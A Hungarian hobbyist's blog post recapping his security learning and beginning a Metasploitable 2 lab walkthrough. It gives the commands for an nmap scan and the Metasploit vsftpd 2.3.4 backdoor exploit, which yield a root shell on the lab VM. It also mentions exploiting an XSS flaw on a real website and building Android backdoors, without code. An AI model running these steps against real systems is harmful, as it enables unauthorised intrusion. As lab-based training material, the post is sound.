Mostanában nagyon nem volt blog... a téma nem állt meg, csak több olyan való életbeli problémát kellett megoldani ami miatt erre nem volt idő. Sajnos, nem sajnos de egy kicsit ki is kellett menni valós életbe a virtuális gépekről.
Itt volt egy kis erkölcsi dilemmám, de győzött a bal vállamon ülő angyal és még az is lehet hogy az illetékes oldal figyelmét felhívom a visszaélés lehetőségére.
Amúgy egy XSS befecskendezésről van szó, amit egy honlap kereső mezőjébe lehet beirni, és mivel az oldal a kérést GET metódussal küldi, így lehet olyan linket összerakni, ahol javascript segítségével lehet plusz tartalmakat hozzátenni az oldalhoz, anélkül hogy annak tartalma más számára is változna. Valószínű hogy ennek technikai megvalósításáról lesz blog is.
Amikor a legutolsó blogot írtam, az sql befecskendezések voltak terítéken, gyakorló pályák, challengek stb.
Utána valahogy belefutottam egy androidos backdoor témába, jó pár exploitot gyártottam, teszteltem. Nagyon jó téma.
Aztán rátaláltam a TERMUX-ra, ami nagyon jó megoldás bizonyos dolgokat tesztelni, megoldani ha nincs laptop, csak okos telefon.
Utána jött egy kis programozós feladat, bár önszorgalomból, de az általam eddig utált JAVA nyelven kellett egy szerver -kliens oldali kommunikációt megírni. Arra mindenképpen jó volt hogy megszeressem a JAVA-t. Minden eddigi ellenszenvem elszállt. :) nem csak a python és a php a világ közepe
Aztán egy chat alkalmazást írtam, ahol a másik oldalról közelítettem meg a dolgokat, és itt a cél nem a sérülékenységek megtalálása volt ,hanem épp ellenkezőleg. Azt elérni hogy ne legyen sérülékenység :) Rájöttem hogy érdemes a kettőt együtt tanulni és gyakorolni. Sokkal hatásosabb lesz. Itt érintettem egy kis apache2 szerver konfigolást, csináltam https tanusitványt, bele kellett menni a portforwrdolásba, szóval csináltam egy webszervert.
Ezután belekóstoltam kicsit a reverse engineering-be. Androidos applikációt kellett visszafordiítani és kiszedni belőle tartalmakat, belenézni a működésébe.
Ezt követte a fentebb említett XSS sérülékenység felfedezése és kihasználása.
Most viszont visszatérek kicsit a "hackelésbe"
A metasploitable 2 virtuális gépet akarom végig csinálni, és ezt a blogon végig követni.
Szedjük le, rakjuk be virtuális gépbe, fontos hogy a hálózat beállításoknál NAT-olást használjunk.
ha elindítjuk akkor msfadmin user-rel és msfadmin jelszóval megy is a gép.
toljunk egy ifconfigot, lássuk hogy mi az ip címünk, majd menjünk át Kaliba, open terminal, majd jöhet egy nmap
Portszkenneléssel megnézzük a futó szolgáltatásokat:
nmap -sV 192.168.xxx.xxx
elég gyorsan lefut, majd kilistázza hogy nagyon sok nyitott portot talált :)
kezdjük az elején, a 21-es porttal.
21/tcp open ftp vsftpd 2.3.4
egy másik terminálban írjuk be:
msfconsole - kis időt hagyunk neki majd ha betölt, akkor keressünk rá a vsftpd-re az alábbi módon:
search vsftpd
ki hitte, volna van is találat :)
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
akkor ezt használjuk is:
use exploit/unix/ftp/vsftpd_234_backdoor
nézzük meg hogy milyen beállítások szükségesek neki:
show options
igazából csak az RHOSTS kell neki, úgyhogy:
set RHOSTS 192.168.xxx.xxx
futtassuk:
exploit
pikk pakk lefut, és már tesztehetjük is:
ls
pwd
whoami -root
azt hiszem ez elég könnyű volt,